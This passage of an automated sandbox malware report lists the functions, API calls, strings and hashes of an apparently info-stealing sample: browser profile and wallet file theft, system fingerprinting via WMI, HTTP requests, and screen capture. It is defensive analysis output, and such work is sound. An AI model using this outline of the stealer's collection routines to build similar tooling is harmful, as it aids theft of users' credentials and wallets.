40a2eb-40a2ef 1553->1584 1585 40a34f-40a364 StrCmpCA 1553->1585 1565 40a731-40a75b call 402920 * 2 1556->1565 1566 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 1556->1566 1557->1556 1562 40a291-40a2cd call 401cfd call 410519 * 2 1557->1562 1612 40a335-40a33f call 410519 call 40884c 1562->1612 1565->1457 1630 40a72b 1566->1630 1584->1556 1586 40a2f5-40a32f call 401cfd call 410519 call 4104e7 1584->1586 1591 40a546-40a55b StrCmpCA 1585->1591 1592 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1585->1592 1586->1612 1591->1556 1598 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1591->1598 1689 40a4b9-40a4c9 StrCmpCA 1592->1689 1690 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 1592->1690 1692 40a623-40a69e call 401cfd call 410519 * 3 call 409072 call 401cfd call 410519 * 3 call 4092a7 1598->1692 1693 40a6a4-40a6b6 DeleteFileA call 402920 1598->1693 1636 40a344-40a34a 1612->1636 1614->1556 1630->1565 1636->1556 1695 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 1689->1695 1696 40a51c-40a52e DeleteFileA call 402920 1689->1696 1690->1689 1692->1693 1708 40a6bb-40a6c2 1693->1708 1695->1696 1707 40a533-40a541 1696->1707 1713 40a6c9-40a6cb call 402920 1707->1713 1708->1713 1713->1556 1733->1734 1734->1548
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                                      • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                                      • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                                      • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                                      • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                    • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                    • API String ID: 4173076446-1189830961
                                                                                                                                                                    • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                                    • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                                                                    • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                                                                                    Function 6C7935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2217 6c7935a0-6c7935be 2218 6c7938e9-6c7938fb call 6c7cb320 2217->2218 2219 6c7935c4-6c7935ed InitializeCriticalSectionAndSpinCount getenv 2217->2219 2220 6c7938fc-6c79390c strcmp 2219->2220 2221 6c7935f3-6c7935f5 2219->2221 2220->2221 2225 6c793912-6c793922 strcmp 2220->2225 2223 6c7935f8-6c793614 QueryPerformanceFrequency 2221->2223 2226 6c79361a-6c79361c 2223->2226 2227 6c79374f-6c793756 2223->2227 2228 6c79398a-6c79398c 2225->2228 2229 6c793924-6c793932 2225->2229 2231 6c793622-6c79364a _strnicmp 2226->2231 2232 6c79393d 2226->2232 2233 6c79375c-6c793768 2227->2233 2234 6c79396e-6c793982 2227->2234 2228->2223 2230 6c793938 2229->2230 2229->2231 2230->2227 2235 6c793650-6c79365e 2231->2235 2236 6c793944-6c793957 _strnicmp 2231->2236 2232->2236 2237 6c79376a-6c7937a1 QueryPerformanceCounter EnterCriticalSection 2233->2237 2234->2228 2238 6c79395d-6c79395f 2235->2238 2239 6c793664-6c7936a9 GetSystemTimeAdjustment 2235->2239 2236->2235 2236->2238 2240 6c7937b3-6c7937eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2237->2240 2241 6c7937a3-6c7937b1 2237->2241 2244 6c7936af-6c793749 call 6c7cc110 2239->2244 2245 6c793964 2239->2245 2242 6c7937ed-6c7937fa 2240->2242 2243 6c7937fc-6c793839 LeaveCriticalSection 2240->2243 2241->2240 2242->2243 2246 6c79383b-6c793840 2243->2246 2247 6c793846-6c7938ac call 6c7cc110 2243->2247 2244->2227 2245->2234 2246->2237 2246->2247 2252 6c7938b2-6c7938ca 2247->2252 2253 6c7938dd-6c7938e3 2252->2253 2254 6c7938cc-6c7938db 2252->2254 2253->2218 2254->2252 2254->2253
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C81F688,00001000), ref: 6C7935D5
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7935E0
                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7935FD
                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C79363F
                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C79369F
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7936E4
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C793773
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C79377E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7937BD
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C7937C4
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7937CB
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C793801
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C793883
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C793902
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C793918
                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C79394C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                    • API String ID: 301339242-3790311718
                                                                                                                                                                    • Opcode ID: 3718349b7b3f64c61884d854b7295040ca450c5e53c8707a184d5e142b5ecc67
                                                                                                                                                                    • Instruction ID: 63d75acd828adcbeee5f5af6e395b1126435f581fbae4426b401f594f957fecf
                                                                                                                                                                    • Opcode Fuzzy Hash: 3718349b7b3f64c61884d854b7295040ca450c5e53c8707a184d5e142b5ecc67
                                                                                                                                                                    • Instruction Fuzzy Hash: 8CB1A4B1B083129FDB18DF28D95661ABBF5AB9A708F05893DE499D3B50D7709C00CBD1
                                                                                                                                                                    Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                    • API String ID: 2178766154-445461498
                                                                                                                                                                    • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                                    • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                                                                    • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                                    • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                                                                    Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                    • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                      • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                      • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                      • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                      • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                      • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                      • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                                    • wsprintfA.USER32 ref: 00411949
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                    • API String ID: 2280294774-461178377
                                                                                                                                                                    • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                    • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                                                                    • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                    • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                                                                    Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: /$UT
                                                                                                                                                                    • API String ID: 0-1626504983
                                                                                                                                                                    • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                    • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                                    • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                                    Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                    • String ID: ERROR$ERROR$GET
                                                                                                                                                                    • API String ID: 3863758870-2509457195
                                                                                                                                                                    • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                    • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                                    • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                                    Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
